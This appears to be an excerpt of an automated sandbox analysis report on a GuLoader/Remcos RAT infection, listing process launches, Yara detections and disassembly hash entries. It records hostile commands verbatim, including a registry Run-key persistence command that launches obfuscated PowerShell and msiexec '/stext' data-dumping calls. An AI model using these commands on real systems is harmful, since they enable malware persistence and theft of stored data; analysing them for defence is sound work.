                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2002636954.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2002956756.000000000D545000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1983290797.000000000606C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:02:34:09
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:02:34:27
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                              Imagebase:0x380000
                                                                                                                                              File size:59'904 bytes
                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:10
                                                                                                                                              Start time:02:34:36
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                                                                                                                                              Imagebase:0x240000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:02:34:36
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:02:34:36
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                                                                                                                                              Imagebase:0xfc0000
                                                                                                                                              File size:59'392 bytes
                                                                                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:02:34:52
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
                                                                                                                                              Imagebase:0x380000
                                                                                                                                              File size:59'904 bytes
                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:02:34:52
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
                                                                                                                                              Imagebase:0x380000
                                                                                                                                              File size:59'904 bytes
                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:15
                                                                                                                                              Start time:02:34:53
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
                                                                                                                                              Imagebase:0x380000
                                                                                                                                              File size:59'904 bytes
                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:02:35:08
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                                                                                                                                              Imagebase:0xe30000
                                                                                                                                              File size:147'456 bytes
                                                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00007FFD9B97AB4A Relevance: .5, Instructions: 546COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f1d10d99f53f3fa5eb1ac0f6edda35670bad1d2338d7d4930e7ccd1b204c4395
                                                                                                                                                • Instruction ID: 9ffdc689116b5717d1ecc056c7ec2d72661d61f175bc3ec8ca7ba9497a7ed0e6
                                                                                                                                                • Opcode Fuzzy Hash: f1d10d99f53f3fa5eb1ac0f6edda35670bad1d2338d7d4930e7ccd1b204c4395
                                                                                                                                                • Instruction Fuzzy Hash: F4022562A0FBC91FE766976848A55657FE1EF56220F1901FFD09CCB1E3DE18AC058342
                                                                                                                                                Function 00007FFD9B8AB0F6 Relevance: .5, Instructions: 470COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1820934477.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: aa6fe5a17f0d1e0065368ddb60fb5bc17520b35ed46a91d563ed2ebde09581e2
                                                                                                                                                • Instruction ID: ee5d99f2c9fc04171bb3e7229ee8a49011e6cbf720226604c143f50eca101be3
                                                                                                                                                • Opcode Fuzzy Hash: aa6fe5a17f0d1e0065368ddb60fb5bc17520b35ed46a91d563ed2ebde09581e2
                                                                                                                                                • Instruction Fuzzy Hash: 61F1A730A09A8E8FEBA8DF68C8657E937D1FF58310F04426EE85DC7295DB3499458B81
                                                                                                                                                Function 00007FFD9B8ABEA2 Relevance: .5, Instructions: 463COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1820934477.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 32afb65e3f5b8ba6cca5fecc9ffc26a2232a76df0f88d9b4020f690fee055f84
                                                                                                                                                • Instruction ID: 1e98d8b8b41ac2f35f52a5cdd3e7ba16cc5cfa77cf821cc6e654375a783534f2
                                                                                                                                                • Opcode Fuzzy Hash: 32afb65e3f5b8ba6cca5fecc9ffc26a2232a76df0f88d9b4020f690fee055f84
                                                                                                                                                • Instruction Fuzzy Hash: 65E1E630A0DA4E8FEBA8DF28C8657E977D1FF58310F04426ED84DC7295DE7899418B81
                                                                                                                                                Function 00007FFD9B979327 Relevance: 1.0, Instructions: 1005COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 70e7d6e09e9c1e246051d5e1ee635cb6a8d4ec8c1dc6b74cf936247be17a7029
                                                                                                                                                • Instruction ID: 9010104e2151b31bbf16f8e3ed7662361a7603cf0b8f50e2b6b5977ffddbeff8
                                                                                                                                                • Opcode Fuzzy Hash: 70e7d6e09e9c1e246051d5e1ee635cb6a8d4ec8c1dc6b74cf936247be17a7029
                                                                                                                                                • Instruction Fuzzy Hash: A6622832B1EB892FE76A966C48A95B47BE1EF56210F1901FFD05DC71E3DE18AC058342
                                                                                                                                                Function 00007FFD9B8AD9FA Relevance: .7, Instructions: 655COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1820934477.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5b7658785d90ce0e2d5f86f0f3e835615e0d88fa5a20ebf426aff95992ab4bc4
                                                                                                                                                • Instruction ID: 5a5ed8fe3843affd444aa38f2d363c7b740778985b87fbb773c4b3af2a8c42de
                                                                                                                                                • Opcode Fuzzy Hash: 5b7658785d90ce0e2d5f86f0f3e835615e0d88fa5a20ebf426aff95992ab4bc4
                                                                                                                                                • Instruction Fuzzy Hash: 0DF15F70A09A4D8FDF98DF58D4A5AAD7BE1FFAC300F15416AE409D7295CA34E881CB81
                                                                                                                                                Function 00007FFD9B974609 Relevance: .5, Instructions: 525COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ad6902684a1bcee5b9d4c333af5e8e21cca5328e6632e70734843c551de89ed3
                                                                                                                                                • Instruction ID: 55f145909cf29601a52351d35726f94a7afbb9dce7a6ea236deb2d1b1a31d6e2
                                                                                                                                                • Opcode Fuzzy Hash: ad6902684a1bcee5b9d4c333af5e8e21cca5328e6632e70734843c551de89ed3
                                                                                                                                                • Instruction Fuzzy Hash: 2EF12A22B1FBC91FE76A976858B56B87BD1EF52210B0A01FFD099C71F3DD19A8058342
                                                                                                                                                Function 00007FFD9B97A3F8 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b7c38c0dc577f1b0e7bcb3860c2944239211aef26ff3ae16595caeaf41daf14e
                                                                                                                                                • Instruction ID: 8ecb3b6cdc1738040230b1ecaa7a78902d96561899485cfe6c31cc7089e95f71
                                                                                                                                                • Opcode Fuzzy Hash: b7c38c0dc577f1b0e7bcb3860c2944239211aef26ff3ae16595caeaf41daf14e
                                                                                                                                                • Instruction Fuzzy Hash: C0E13632B1EB8D1FE769DB6848A52787BE1EF95210F1901BED05CC71E3DE28AC458742
                                                                                                                                                Function 00007FFD9B979EC4 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b0cc8417d4ccacd020377f2118f24d9b5149990ba244c7eb08ccc560f52c0b1e
                                                                                                                                                • Instruction ID: 1d1f692a50a679963b04755818805b79bcb4a569112d5c761ff601c78486be5b
                                                                                                                                                • Opcode Fuzzy Hash: b0cc8417d4ccacd020377f2118f24d9b5149990ba244c7eb08ccc560f52c0b1e
                                                                                                                                                • Instruction Fuzzy Hash: FCC1D322B1FBCD1FEBA696A848A45647FE1EF57210B1A41FBD05CCB1E3D908AD05C391
                                                                                                                                                Function 00007FFD9B979768 Relevance: .4, Instructions: 418COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: de347d36791ace64c734c55735ff1fcfbdb342db2453aa8139bbae3123bae697
                                                                                                                                                • Instruction ID: 3039108580cb49e97190f340440b6a56a7786b1e18b3db4aa93028c8ca571bb9
                                                                                                                                                • Opcode Fuzzy Hash: de347d36791ace64c734c55735ff1fcfbdb342db2453aa8139bbae3123bae697
                                                                                                                                                • Instruction Fuzzy Hash: 44D12822B1FB892FE7659B6C48A95687BE1EF55210F1901FED05CCB1E3DE28AC458342
                                                                                                                                                Function 00007FFD9B97767A Relevance: .4, Instructions: 380COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 38966681ab9537addec7aef5cf4271cf5a496892b8faf25a7aa75fed4cfff877
                                                                                                                                                • Instruction ID: 8d85f8a924b33db22c10cb2b26c8ce30b22077103e38ba9857582a962d823b46
                                                                                                                                                • Opcode Fuzzy Hash: 38966681ab9537addec7aef5cf4271cf5a496892b8faf25a7aa75fed4cfff877
                                                                                                                                                • Instruction Fuzzy Hash: 79B15732B1EA4E5FE7B9DA6888A16B477D1EF95310F1501BED05DC31E2DE29AC06C381
                                                                                                                                                Function 00007FFD9B9755AD Relevance: .3, Instructions: 341COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8a635df213bfdbc330d7f783fb85afa280d8be381236949b3a1b4dcf8cf94ae6
                                                                                                                                                • Instruction ID: 28da4bc87a8b59b34214d821a629c3b08f8491fa8730fc8395e6a61f23eebf51
                                                                                                                                                • Opcode Fuzzy Hash: 8a635df213bfdbc330d7f783fb85afa280d8be381236949b3a1b4dcf8cf94ae6
                                                                                                                                                • Instruction Fuzzy Hash: 08A13422B2FB8D5FEBE6D76848A45B57BE1EF56210B0A00FBD45CCB1E3D908AC058341
                                                                                                                                                Function 00007FFD9B8ABAB6 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1820934477.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9de782ff6952e6949ea26b1b97593ba0cc632d6501e74a534cc24ff901d900fa
                                                                                                                                                • Instruction ID: 02b2bfed8238a77cbb66f37d8722dce2cbb04c77de5f171518e9e1443e3cb42b
                                                                                                                                                • Opcode Fuzzy Hash: 9de782ff6952e6949ea26b1b97593ba0cc632d6501e74a534cc24ff901d900fa
                                                                                                                                                • Instruction Fuzzy Hash: 73B1C63060DA4D4FDB68DF28D855BE93BE1FF59310F04426AE84DC7291CE34A941CB82
                                                                                                                                                Function 00007FFD9B97A8DA Relevance: .2, Instructions: 219COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: cc1edae3f8384eb472de747722a9d0ec97a27fec15ac95a32144fcca91751221
                                                                                                                                                • Instruction ID: 67a1be1d5464c3ba4d288655e3a248bcfa9477ebdb28e3fedd4b96d80491bddb
                                                                                                                                                • Opcode Fuzzy Hash: cc1edae3f8384eb472de747722a9d0ec97a27fec15ac95a32144fcca91751221
                                                                                                                                                • Instruction Fuzzy Hash: 7F61D421A1F7CD5FDB679B7848606A57FE1EF56210B0A01FBC099CB0E3DA18A949C352
                                                                                                                                                Function 00007FFD9B9795C8 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 78de082d945d90156aa9bb640d9c5c353380f1af4a95b8f3d3b39103626438be
                                                                                                                                                • Instruction ID: 5b50d2b9dfdf2dbf11c345893684dbe2a5df2a2f65a7631b3db68493870a5607
                                                                                                                                                • Opcode Fuzzy Hash: 78de082d945d90156aa9bb640d9c5c353380f1af4a95b8f3d3b39103626438be
                                                                                                                                                • Instruction Fuzzy Hash: 33418E21A1FBC92FE7A7966848B94647FE0EF5325470A01EBC498CB1E3D909AD498352
                                                                                                                                                Function 00007FFD9B9756D2 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b861965bfb82f524fa11267b313ffd92798f1d4c00f0fb4c54ef7e46f7651b54
                                                                                                                                                • Instruction ID: 1bde49bdb7828e54bd7ddfbe0eb51c37cd42ad9dc0ac2eaa49d0ed53c47af6c5
                                                                                                                                                • Opcode Fuzzy Hash: b861965bfb82f524fa11267b313ffd92798f1d4c00f0fb4c54ef7e46f7651b54
                                                                                                                                                • Instruction Fuzzy Hash: FF31F422F2FACA5BE7F596A828B51B967C1EF50754F5A00BAD45DCB1F3ED086C008341
                                                                                                                                                Function 00007FFD9B974794 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2b8ab8e426c6803c2c7e926c4e236633482d293ff6957c379070bc39aacedfb1
                                                                                                                                                • Instruction ID: fc912df88ae53f9c1da32c2791b2a58822bb627053526f3e75aa12ee9f9afd81
                                                                                                                                                • Opcode Fuzzy Hash: 2b8ab8e426c6803c2c7e926c4e236633482d293ff6957c379070bc39aacedfb1
                                                                                                                                                • Instruction Fuzzy Hash: 8B21E922B2FA8D1BE3B9976854B16B867C1DF95220F5A00FED45DC72F3ED19AC014241
                                                                                                                                                Function 00007FFD9B8AB5B4 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1820934477.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 34b82c03a47451bb79f02e92d8cff7fd78533c96e27ed9589331368919faaa3a
                                                                                                                                                • Instruction ID: 92c7fa4708492259b0de18bab69a662a16e71e7eb4891f4172da079d5c8eda41
                                                                                                                                                • Opcode Fuzzy Hash: 34b82c03a47451bb79f02e92d8cff7fd78533c96e27ed9589331368919faaa3a
                                                                                                                                                • Instruction Fuzzy Hash: 94311630A1964ECEFBB49F65CC25BF932D4FF49719F410139D40D860A2DB396A45CB21
                                                                                                                                                Function 00007FFD9B97189F Relevance: .1, Instructions: 79COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1821425974.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 25a182e3fc47a2593728c4524af4e82fc31f64a74a87bc5afa43fb3611559fc8
                                                                                                                                                • Instruction ID: dea26198f19634410b73dd125d64d2d5e07bbe9483e8c01aa2bbfa4845fa258b
                                                                                                                                                • Opcode Fuzzy Hash: 25a182e3fc47a2593728c4524af4e82fc31f64a74a87bc5afa43fb3611559fc8
                                                                                                                                                • Instruction Fuzzy Hash: B6213752F1FBCA1FE765A77828A51A42BD1EF5A658B0A40FFD099CB1E3DC181C068312
                                                                                                                                                Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1820934477.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                                                                                                                                                Executed Functions

                                                                                                                                                Function 04EAEDF0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ee1742c607b03f50333e6991072d94a919327503e3c8533165401ccfdbcdca40
                                                                                                                                                • Instruction ID: b17e2379ed54e9aaac44df22711a2c5f6df37d27d1e01e01fb2f748c4dcfa8f9
